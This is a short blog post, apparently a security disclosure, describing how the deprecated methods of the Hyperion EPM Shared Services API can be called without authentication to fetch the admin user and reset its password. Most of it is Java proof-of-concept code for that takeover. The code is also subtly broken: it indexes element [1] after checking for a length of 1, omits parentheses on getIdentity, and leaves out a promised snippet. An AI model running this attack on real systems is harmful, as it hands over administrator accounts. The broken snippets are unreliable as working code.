Some words about security in CSSAPI
Shared Services API allows user to work with Users and Group directory, changing security. Simply look at CSSDirectoryManagementAPIIF. It has plenty functions which you can use for integration projects and security.
You may ask: what do I need to get access to the CSSDirectoryManagementAPIIF?
Answer: nothing special
1 2 3 4 | Map context = new HashMap(); CSSSystem system = CSSSystem.getInstance(); CSSAPIIF cssApi = system.getCSSAPI(); CSSDirectoryManagementAPIIF cssDirectory = cssApi.getDirectoryManagementAPI(context); |
That is all, no authentication requires.
But... if we compare to versions of CSSAPI 9.3 and 9.5. All methods in 9.5 API require new parameter:
CSSPrincipalIF - it identifying the user requesting information. Cannot be null.for example:
1 | getUsers(java.util.Map context,CSSPrincipalIF principal,java.lang.String userName) |
Old method from CSSAPI are deprecated.
Let's try to get admin access without identifying. Old functions are deprecated but we can call it
This method returns user by it login. At the end we need simply check array lengths and set new password:
1 2 3 | if(userArr.length==1) cssDirectory.setPassword(context,userArr[1].getPrincipal(), userArr[1].getPrincipal().getIdentity,"newpassword"); |
As you notice we use setPassword method. It requires not null
CSSPrincipalIF for identifying, but we passed admin user Principal instead =) And successfully changed password for admin user without any authentication! Summary
Obviously, it is a security issue, but it is not easy to use it, because you need to get reg.properties file with database access configuration and Hyperion EPM is a system for private networks, therefore external security is not on the first place for developers
P.S. I tested this methods on Hyperion EPM 11.1.2.3.+ , 11.1.2.4
No comments:
Post a Comment